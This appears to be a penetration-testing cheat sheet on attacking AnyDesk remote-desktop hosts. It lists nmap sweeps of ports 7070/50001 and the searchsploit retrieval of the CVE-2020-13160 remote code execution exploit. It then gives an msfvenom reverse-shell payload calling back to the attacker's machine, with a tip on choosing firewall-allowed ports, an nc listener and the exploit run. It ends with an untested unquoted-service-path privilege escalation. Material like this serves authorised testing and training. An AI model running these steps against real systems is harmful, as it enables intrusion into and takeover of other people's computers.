AnyDesk – port 7070 (TCP) / 50001 (UDP)

AnyDesk is a proprietary remote desktop application distributed by AnyDesk Software GmbH that provides platform independent remote access to personal computers and other devices running the host application.

AnyDesk is frequently used by scammers. It offers remote control, file transfer, and VPN functionality.

Nmap sweep for AnyDesk

IP=x.x.x.1-254
sudo nmap -Pn -sT -sC -sV -p 7070 -T5 --open $IP
sudo nmap -Pn -sU -sC -sV -p 50001 -T5 --open $IP

Exploits

searchsploit anydesk

AnyDesk 5.5.2 – Remote Code Execution (CVE-2020-13160)

searchsploit -m 49613

Generate the shellcode

Depending on firewall rules, might need to use a port that is allowed, like the 7070 (allowed for AnyDesk) instead of 4444 like suggested in the exploit.

msfvenom -p linux/x64/shell_reverse_tcp LHOST=$KALI_IP LPORT=4444 -b "\x00\x25\x26" -f python -v shellcode
  • Edit IP address to victim host. Leave port 50001 as it is default UDP port for AnyDesk.
  • Replace generated shellcode in the exploit.

Start a listener

nc -nlvp 4444

Execute the exploit

./49613.py

Should get a shell within 5 seconds according to the exploit.

Privilege Escalation (Windows)

sc query AnyDesk
sc qc anydesk
C:\Program Files (x86)\AnyDesk\AnyDesk.exe

Not tested, but the only option seems to be:

C:\Program.exe

See Windows Unquoted Service Path. Could require a reboot if service cannot be restarted.